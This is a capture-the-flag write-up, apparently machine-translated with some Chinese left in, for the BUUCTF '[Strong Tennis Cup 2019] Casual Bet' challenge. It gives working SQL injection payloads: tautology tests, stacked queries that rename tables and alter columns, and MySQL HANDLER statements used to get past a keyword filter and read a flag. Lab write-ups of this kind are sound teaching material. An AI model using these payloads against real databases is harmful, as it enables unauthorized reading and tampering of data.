BUUCTF-[Strong Tennis Cup 2019] Casual Bet
Table of contents
topic
answer
Open the shooting range and enter the shooting range environment
Normally submitted data, information can be queried
View source code:
found that sqlmap may not work
back to range
Test to verify the presence of injection
?inject=1'
An error message appears
Use the master key to see if the data information can be exploded
?inject=1' or 1=1--+
Successfully echoed, exposing the data information
The number of judgment fields
/?inject=1' order by 3--+
Enter 3 to report an error, replace 3 with 2, if no error is reported, it means that the table has 2 columns of fields
After replacement:
echo successfully
Judgment echo point
It is found that the above keywords are filtered out, and the data cannot be queried.
Attempt stack injection:
In SQL, a semicolon (;) is used to indicate the end of a sql statement. We try to continue to construct the statement after the end, and observe whether it will be executed together. Stack injection can execute arbitrary statements.
/?inject=1';show databases; 查看全部数据库
查看当前数据库的数据表
/?inject=1';show tables;
查看表中有哪些字段
desc tablename或
show columns from table tablename
Note: When the table name is a number, use `` reference, otherwise the information cannot be viewed normally
Check the field information of the table and find the flag, but we have no way to check the content of the flag, let's look at the data fields in the words table
show columns from tablename 查询表中的字段信息(列的信息)
Observation found that the data we found out may be the data in the words table. We can rename 1919810931114514the table to words, change the flag field to id, and then use the master key to explode the data.
First of all, it is normal to look up the data of the words table, we first rename the words table to something else, the name is arbitrary. Use rename to change the table name or alter
alter命令格式:
修改表名:ALTER TABLE 旧表名 RENAME TO 新表名;
修改字段:ALTER TABLE 表名 CHANGE 旧字段名 新字段名 新数据类型;
rename命令格式:rename table 原表名 to 新表名;
Secondly, 1919810931114514rename the table to words, and then change the flag field to id
Finally, use the master key to burst the table data
payload:
?inject=1';rename table words to word;rename table `1919810931114514` to words;alter table words change flag id varchar(100);#
Looking at the datasheet again:
It is found that the table name has been modified, and then use the master key to explode the data
?inject=1' or 1=1--+
Successfully obtained the flag
The flag of this question is:
flag{
a1a228e9-fc3d-4e3e-97c4-17ee692fedd5}
Method Two:
Use the handler function
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。
When keywords such as selectet are filtered out, you can try to use this method to query
handler tablename open;打开表
handler tablename read first或next;读取第一行或下一行
handler tablename close;关闭表
Usage of this question:
payload:
?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first;handler `1919810931114514` close;
Successfully obtained the flag
Other methods can also be bypassed, such as encoding
If the article is inappropriate, criticism and correction are welcome!